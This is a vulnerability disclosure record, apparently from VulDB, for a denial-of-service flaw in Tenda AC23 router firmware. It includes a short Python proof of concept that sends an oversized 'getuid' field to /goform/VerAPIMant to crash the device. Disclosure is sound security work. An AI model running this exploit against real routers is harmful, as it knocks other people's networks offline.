| عنوان | Shenzhen Tenda Technology Co., Ltd. Tenda AC23 Router V16.03.07.52 Denial of Service |
|---|
| الوصف | A binary vulnerability exists in Tenda AC23 firmware version V16.03.07.52. Attackers can exploit this vulnerability by sending malicious requests to a specific API interface, causing the device's CPU to overload and the router to crash, rendering it inaccessible. This vulnerability can be triggered remotely, leading to service disruption and affecting the normal operation of network devices.
Attackers can trigger the vulnerability by sending specially crafted malicious requests, causing the router to crash and become unresponsive. Below is an example of the attack code:
import requests
url = "http://192.168.85.160/goform/VerAPIMant"
data = {
"getuid": b'A' * 1000000000 # Construct oversized data
}
res = requests.post(url=url, data=data)
print(res.content) |
|---|
| المصدر | ⚠️ https://github.com/LZY0522/CVE/blob/main/CVE_1.md |
|---|
| المستخدم | Li Zhiyang (UID 83252) |
|---|
| ارسال | 26/03/2025 10:28 AM (1 سنة منذ) |
|---|
| الاعتدال | 03/04/2025 09:29 AM (8 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 303113 [Tenda AC23 16.03.07.52 API Interface /goform/VerAPIMant getuid الحرمان من الخدمة] |
|---|
| النقاط | 20 |
|---|